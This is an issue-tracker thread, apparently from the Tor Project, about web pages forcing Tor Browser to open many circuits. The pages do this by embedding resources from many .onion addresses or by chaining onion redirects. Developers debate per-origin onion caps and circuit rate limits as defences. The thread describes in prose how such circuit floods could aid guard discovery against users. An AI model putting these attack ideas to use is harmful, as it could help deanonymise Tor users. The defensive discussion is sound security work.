A malicious web page or an exit node* can force Tor to open too many new circuits by embedding resources from multiple .onion domains.
I could observe up to 50 new circuits per second, and a total of a few hundred circuits in less than a half minute.
The embedded HS domains don't need to exist, Tor will still open an new internal circuit for each .onion domain to download the descriptors.
I guess forcing clients to make too many circuits may enable certain attacks, even though the circuits are internal.
Maybe Tor (or Tor Browser) could cap the number of new circuits opened within a time window. I can't think of a realistic use case for loading resources from tens of different hidden services.
*: only when the connection is unencrypted HTTP
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information
Child items ...
Show closed items
Linked items 0
Link issues together to show that they're related.
Learn more.
Maybe Tor (or Tor Browser) could cap the number of new circuits opened within a time window. I can't think of a realistic use case for loading resources from tens of different hidden services.
Unlike the generic or custom-built Tor client case (CDNs and status pingers will likely customize their Tor client for performance), Tor Browser specifies a SOCKS username and password for url bar domain isolation. When this u+p is set, we should be able to safely limit the number of onion hostnames for a single SOCKS username + password to some low number (5? 10?).
Do we need a separate limit if third party hidden services are malicious and deliberately fail either HSDIR, IP, or RP attempts in a way that causes the client to retry them? Maybe there should be a total rend circuit limit per SOCKS u+p?
How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
You mean this should be fixed on the browser side? It seems to me having a patch in tor makes more sense.
How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
You mean this should be fixed on the browser side? It seems to me having a patch in tor makes more sense.
After some more discussion happened, let's try to fix that on the browser side (first). mcs/brade: can you look into it?
Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
Good question. I think we can spend some time figuring that out so we can come up with a good plan for fixing this bug.
After some more discussion happened, let's try to fix that on the browser side (first). mcs/brade: can you look into it?
Yes, we can take a look. It would be helpful to develop a better understanding of what kind of attack(s) we are trying to prevent. That might lead to a better design. For example, do we want to limit the rate at which new circuits can be opened or do we just want to refuse to open more than N circuits per site? Unfortunately, Kathy and I don't really know enough about tor and the Tor Network to do that kind of analysis, so hints about what should be done would be greatly appreciated.
Here is another attack from IRC arma: An attacker could also setup an onion address that redirects you to another onion address which redirects you to another onion address ad infinitum. This allows the attacker to cause n onion loads in series, and if each page has k onions, this allows attacker to cause n*k onion loads. That's both an optimization but is also meant to work around any defences that try to restrict onion address loads per origin.
Furthermore, depending on how stream isolation works, the above attack could also work with IPs/domain addresses and not just onions.
Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
I opened #25609 (moved) to investigate the issue presented in the last parenthesis of this post. It's important because if an attacker can cause Tor to make many circuits by continuously retrying a broken onion, this can bypass any sort of origin rate-limiting defense.
since dosmitigtion system, with this happening, dosmitigtion will make your clientip unuseable for your guard for atleast one hour.
IMHO the naive dos mitigation should be disabled since the DDOS stopped.
Reviving this ticket and marking it as s27-must. Marking for 6 points since we need to figure out how to do this. Marking #29995 (moved) as its parent, but it could also go under #29999 (moved) just as easily.
We might need some fixes in Tor, and some fixes in Tor Browser.
If we make all (non-single onion service) clients rate-limit onion circuits, then some applications may need to rate-limit individual tabs (Tor Browser), contacts (Ricochet), or peers (Bitcoin).
We might need some fixes in Tor, and some fixes in Tor Browser.
If we make all (non-single onion service) clients rate-limit onion circuits, then some applications may need to rate-limit individual tabs (Tor Browser), contacts (Ricochet), or peers (Bitcoin).
Yep. I was thinking that an initial MVP here could be to just improve the situation in Tor Browser for now. The benefit here is that we can gear the defence to just web users, so that we don't have to think about all the possible applications that use onions.
Still that seems pretty hard to do:
Here is a version of the attack: The attacker makes many different evil onions with different traffic patterns. The attacker also sets up some middle nodes around the network. The attacker forces the victim to visit them (in a hidden iframe or through redirects or whatever), and then check its middle nodes for the given traffic patterns. If we assume that the "confirm traffic patterns" step is instant and accurate, then an attacker that runs 5% of the middle node capacity, can get 50% chance of guard discovery after about 14 circuits (also see prop292 calculations)... So this looks pretty bad...
The good part is that the attacker needs to persuade the victim to visit their website (not so hard), and also leave the tab open for as long as the attack needs to succeed.
Still it's hard to rate limit this sufficiently to block 5% adversaries, without also blocking legitimate websites (especially if in the future onions become more prevalent and well connected)...